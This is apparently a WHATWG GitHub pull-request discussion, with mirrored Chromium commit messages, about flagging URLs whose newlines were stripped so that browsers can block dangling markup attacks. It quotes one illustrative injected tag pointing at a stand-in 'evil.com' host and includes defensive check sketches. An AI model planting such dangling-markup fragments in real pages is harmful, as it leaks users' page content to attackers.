Record whether the URL parser removed newlines. #284
Apart from nits this looks reasonable. I'm guessing it's fine to leave this as a PR until there's also Fetch integration, tests, and hopefully interest from more implementers? |
As a mitigation against dangling markup attacks (which inject open tags like `<img src='https://evil.com/` that eat up subsequent markup and exfiltrate content to an attacker), this patch tightens request processing to reject requests whose URLs contain a `<` character (consistent with an HTML element) _and_ had newline characters stripped during URL parsing (see whatwg/url#284). Based on initial metrics, it might be possible to reject every URL whose newline characters were stripped, regardless of `<`. If those metrics pan out the way I hope, we can tighten this up in the future.
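A minimal Python sketch of the check described above, for illustration only. The function name is hypothetical, and treating tab, LF, and CR as the stripped characters is an assumption based on the URL parser's existing tab/newline removal; the actual patch expresses this as flags on the URL rather than as a standalone predicate.

```python
# Hypothetical predicate: not the spec text, just the two conditions combined.
# Assumption: "newline characters stripped" covers tab, LF, and CR.
TAB_OR_NEWLINE = {"\t", "\n", "\r"}


def is_potentially_dangling_markup(raw_url: str) -> bool:
    """True when the raw input has a character the parser would strip AND a '<'."""
    had_tab_or_newline = any(ch in TAB_OR_NEWLINE for ch in raw_url)
    has_less_than = "<" in raw_url
    return had_tab_or_newline and has_less_than
```

Under this sketch, a URL with only a `<` or only a newline is still allowed; only the combination is rejected.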
Updated with a less-than flag, as discussed in whatwg/fetch#519. |
I'm ok with having a conceptual reference to something like this, but I don't think this necessarily belongs in the URL spec and I would be quite opposed to exposing this to JavaScript or something like that. WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers. |
@achristensen07 where would it belong? You can't do it after the fact, since by then the newlines are gone. It would be observable to JavaScript due to the Fetch integration. Implementing this in a single-pass implementation seems relatively straightforward, though, if you already do whitespace removal that way. |
Do we want these flags to remain independent? If they're only ever used together... |
I guess it might not be completely catastrophic to add some code to the unlikely branches that are taken when a tab or newline is hit. I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this. |
I believe putting this into URL makes it possible for us to avoid walking through the URL twice. As @annevk notes, after parsing the URL, the data we're looking for is actually unavailable. We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange. We're already walking through the URL once to remove newlines; recording that state then seems reasonable.
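To illustrate the "record it while you are already stripping" argument, here is a hedged Python sketch of a single pass that copies non-tab/newline characters to a new string and notes what it saw along the way. `StripResult` and `strip_and_record` are hypothetical names, not anything from the URL Standard or from Blink or WebKit.

```python
from typing import NamedTuple


class StripResult(NamedTuple):
    cleaned: str                  # input with tabs and newlines removed
    removed_tab_or_newline: bool  # set if anything was stripped
    saw_less_than: bool           # set if a '<' was copied through


def strip_and_record(raw: str) -> StripResult:
    """One loop over the input: strip, and record both flags as a side effect."""
    out = []
    removed = False
    saw_lt = False
    for ch in raw:
        if ch in "\t\n\r":
            removed = True  # the only extra work on the stripping branch
            continue
        if ch == "<":
            saw_lt = True
        out.append(ch)
    return StripResult("".join(out), removed, saw_lt)
```

The point of the sketch is that the flags come from the same loop that does the removal, so no second scan of the string is needed.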
Yeah. I realized this while playing with an implementation in Chrome; I'll update this patch accordingly. |
What does WebKit's implementation of newline removal look like now? Do y'all just farm out to NSURL?
As written here, the flag isn't exposed to the web (except implicitly via the Fetch behavior, as @annevk notes). I agree that it doesn't seem necessary to add a
Happy to have that discussion on the other patch: whatwg/fetch#519. Given that we're already doing things like https://fetch.spec.whatwg.org/#should-response-to-request-be-blocked-due-to-mime-type? there, this doesn't seem like much of a stretch, but I'm interested in hearing about possible alternatives. |
1ab78b5 changes the algorithm to bring it in line with what I expect implementations are doing today: copying non-tab/newline characters to a new string. Setting this flag turns into one extra WDYT? |
A more efficient implementation can and has been done in https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/platform/URLParser.cpp |
That's a clever implementation, thanks for sharing the link! I agree that it would be a little more work for y'all to get the behavior specced here, but I think you can still do it in a single pass. For example, I could imagine that the two-flag proposal from earlier in the thread might be reasonable:
with a corresponding value on
I agree that the benefit is something we'd need to weigh against the performance costs, and that's a judgement call that I can't make for the WebKit project. From my perspective, dangling markup is a well-known and fairly soft target for attackers. As we continue to close off other avenues for code injection (via CSP, etc.), it's only going to increase in impact. Killing off a substantial portion of this class of attack seems like it's worth some cost to URL processing speed. |
I think it might be good to point this out in the spec, and further elaborate on the nature of this flag as not relevant for the general URL parsing behavior that the URL Standard mostly covers. I would phrase it as something like this:
However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right? (Unlike my above paragraph states.) Which means that attempting to do new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href); will fail, right? Are there tests for this (and for other non-HTML-markup-related URL parsing behaviors)? Is this even desirable? Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all... |
That's correct. It seems simplest to make the behavior consistent at the Fetch layer.
This wouldn't fail, actually, because you're stringifying a parsed URL. That is, the result of
Writing it that way is fine, if cumbersome because of all the call sites. I don't intend to implement it that way in Blink, however. As noted above, URL parsing is expensive, and I don't think there's much appetite for doing more loops through the string. I understand that it's confusing to put a flag like this into URL if it's not used in URL, but if we put it somewhere else, I think we'd probably end up adding a note about how implementers should probably implement it as part of their URL parser. If you're happier with that as an outcome, I can type it up. |
Right, thanks. I guess I meant new WebSocket(`wss://example.com/foo\nbar>baz`); will fail. Again, is this desired behavior? Are there tests for it, and other cases like it? |
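The difference between the two `WebSocket` examples can be sketched in Python. This models only the newline flag, with a hypothetical helper standing in for the parser's stripping step: the raw string trips the flag, while the already-serialized form does not, because the newline is gone by the time it is parsed again.

```python
def strip_tabs_and_newlines(raw: str):
    """Hypothetical stand-in for the parser's tab/newline removal step."""
    # Map the code points for tab (9), LF (10), and CR (13) to None to delete them.
    cleaned = raw.translate({9: None, 10: None, 13: None})
    return cleaned, cleaned != raw


raw = "wss://example.com/foo\nbar>baz"

# Parsing the raw string: the newline is stripped, so the flag is set.
serialized, flagged_on_raw = strip_tabs_and_newlines(raw)

# Parsing the serialized result again: nothing left to strip, flag stays unset.
_, flagged_on_serialized = strip_tabs_and_newlines(serialized)
```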
I don't think I would be. Those kinds of mismatches with implementations tend to break down completely over time. We could still restrict which callsites the flag has an effect for, but it's unclear if it's worth it. |
I think so, yes. If we're going to block raw
I've added fetch tests to Chrome's tentative implementation of this behavior. Should be upstreamed shortly. |
FWIW, I agree. Doing things in URL makes much more sense to me.
I don't think that would be worthwhile, but if others do, I wouldn't strenuously object. :) |
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Cr-Commit-Position: refs/heads/master@{#474249} WPT-Export-Revision: 34b8d6ab689b1ecedef332baa2a155b543f50fa7
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474268} WPT-Export-Revision: 76847294b106c9c50e921ac523722675102d452e
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474290} WPT-Export-Revision: 9545e01418eb8738e5646b86527b986b3f2047a1
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474292} WPT-Export-Revision: 8f0c33883ba9ad137a9ed9fe8a758022230f3e06
I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I oppose putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs. |
Note: I don't oppose preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we want to instead put concepts here then they should not change the behavior of all URL parsing or require more memory for all URLs. |
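A rough Python sketch of the pre-scan alternative described in this comment, assuming the check is "contains `<` and contains a tab or newline". The wrapper name is hypothetical, and `urllib.parse.urlsplit` is used only as a stand-in for an unmodified URL parser; it is not a WHATWG-conformant one.

```python
from urllib.parse import urlsplit


def parse_attribute_url(raw: str, parse=urlsplit):
    """Hypothetical HTML/SVG call-site wrapper around an unmodified parser.

    The scan happens here, before parsing, so the parser and the URL
    object it returns carry no extra state.
    """
    if "<" in raw and any(ch in raw for ch in "\t\n\r"):
        return None  # treat as a parse failure at this call site only
    return parse(raw)
```

The trade-off raised elsewhere in the thread is visible here: the parser stays untouched, but the string is walked an extra time at every wrapped call site.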
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474341}
I'm sympathetic to this, but if WebKit implemented something along these lines, wouldn't y'all do it in the URL parser? I don't think Blink would accept running through the string again. In fact, I know we wouldn't, because my first pass at adding metrics for this did three string scans when completing URLs, caused a ~30% drop in parsing performance on Android and triggered exciting alerts in my inbox (https://bugs.chromium.org/p/chromium/issues/detail?id=682300). :) Given that it makes sense for the implementation to live in the URL parser, defining it there seems to also make sense. |
Our URL object is used for many things in the operating system that have nothing to do with HTML parsing. We have many public APIs for apps that make URL objects behind the scenes, for example. We also do many things with the network that have nothing to do with HTML. We would not want to slow all those things down, even just by decreasing instruction locality through extra instructions in unlikely branches, and we would not want to require more memory for all those URL objects. If I implemented this change in WebKit, I would have to look into how performance is actually affected and consider many things, but my initial thought is that I would just pre-scan the String given from the HTML/SVG parser to the URL parser. As one of what is probably the majority of URL users, who do things with URLs unrelated to HTML, I do not think this belongs in the URL specification. |
I'm very sympathetic to @achristensen07's point of view conceptually. In particular I am very happy that WebKit uses these URL objects behind the scenes for all networking; that is exactly how it should be. But I want to try to tease out the concrete objection. My take is that it should be an editorial decision (as in, up to the editor) as to where this field is stored---as long as the observable consequences are the same. I strongly urge the editor to include a note similar to mine in #284 (comment) (modified to talk about Fetch instead of HTML) so that people implementing this spec can understand that storing the flag inside the URL is a spec convenience, and they may want to make alternate implementation decisions (e.g. if they plan on flowing the URLs into places that are never Fetched). However, what I am concerned about is whether we have cross-browser agreement on applying this mitigation, and particularly the scope of it, in terms of observable consequences. My understanding is that @achristensen07 "doesn't oppose" preventing the attack. But does that include preventing it for all other places URLs are parsed and then go through the Fetch spec, as the current set of patches do? His follow-up comment "I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser" implies he might not be on board with the full scope of the currently-proposed mitigation, which includes, as I said, everywhere a URL is parsed and then fed to Fetch. My go-to example in this thread has been So, @achristensen07 ---leaving editorial issues of how the spec is written aside (at least for now), what are your thoughts on the actual mitigation strategy proposed? |
Running through every URL is expensive; as I noted above, a very naive implementation caused a ~30% regression in one of Blink's parsing benchmarks. I imagine a cleverer implementation would have less impact, but it seems non-negligible. I could also imagine tagging the attribute as containing newlines and less-than characters during HTML tokenization/parsing, but that a) also seems expensive, and b) would require holding a boolean on each attribute, which seems more expensive than holding a boolean on a URL. Do you have a different approach in mind, @achristensen07? I'm not at all philosophically tied to putting this into the URL parser, but it seems like the most efficient place to do the work, especially since we're already required to remove newline characters from URLs. Why not recognize other properties at the same time? |
I think that mitigation of an HTML injection attack should go in the HTML spec. It is bad design to try and catch it at all the points of data entry into the HTML parser instead. What if someone dynamically generates a malicious HTML string with JavaScript, for example? I think it's also bad design to put more HTML concepts into the URL spec, which is used for non-HTML applications. If an implementer feels that they want to slow down their URL parser to implement it, then they can do that. I probably wouldn't. |
Let's say that we go this route, and alter https://html.spec.whatwg.org/#resolving-urls to scan the input string for characters we don't like. That seems fine in itself, and we could add a note to implementers about doing this work in parallel with whitespace removal if they feel like it (because, as we've both noted, scanning through every URL string is expensive). We could then look at the scheme of the resulting URL record and abort with a parse error for those URLs containing both character types and HTTP(S) schemes. I think that would be somewhat equivalent to the current set of patches in the main set of cases that I care about (with the caveats that the errors would look different: And actually, looking at HTML again, not everything there uses the wrapper: |
@annevk: What would you like me to do here? |
If we don't want to overload the generic URL parser we should figure out in which places this attack can take place (only HTML/SVG element attributes I assume?) and only apply the mitigation there. That might involve creating a new abstraction to invoke from these places. |
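One shape such an abstraction might take, combined with the scheme check suggested earlier in the thread, is sketched below in Python. Everything here is an assumption for illustration: the names are hypothetical, `urllib.parse.urlsplit` stands in for a real URL parser, and restricting the error to HTTP(S) follows the suggestion above rather than any agreed spec text.

```python
from urllib.parse import urlsplit


class DanglingMarkupError(ValueError):
    """Hypothetical error for URLs rejected by the markup-specific wrapper."""


def resolve_for_markup(raw: str) -> str:
    """Strip tabs/newlines, then reject HTTP(S) URLs that also contain '<'."""
    # Delete tab (9), LF (10), and CR (13); compare to see if anything was removed.
    cleaned = raw.translate({9: None, 10: None, 13: None})
    suspicious = cleaned != raw and "<" in cleaned

    # Only network schemes are rejected; other schemes pass through unchanged.
    scheme = urlsplit(cleaned).scheme
    if suspicious and scheme in ("http", "https"):
        raise DanglingMarkupError("tab/newline and '<' in an HTTP(S) URL")
    return cleaned
```

Call sites that never deal with markup attributes would keep calling the plain parser and would not pay for the check.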
In order to support checks like those sketched out in [1], it would be helpful to record at parse-time whether or not tabs and newline characters were stripped from a given URL. This patch does so by adding a cleverly-named flag that could be referenced from other specifications. Fetch, for instance.
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Original-Commit-Position: refs/heads/master@{#474341} Cr-Mirrored-From: https://chromium.googlesource.com/chromium/src Cr-Mirrored-Commit: 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
Note that I think this got closed because @mikewest removed his fork and the default branch was renamed to main. This issue will continue to be tracked in whatwg/fetch#546. |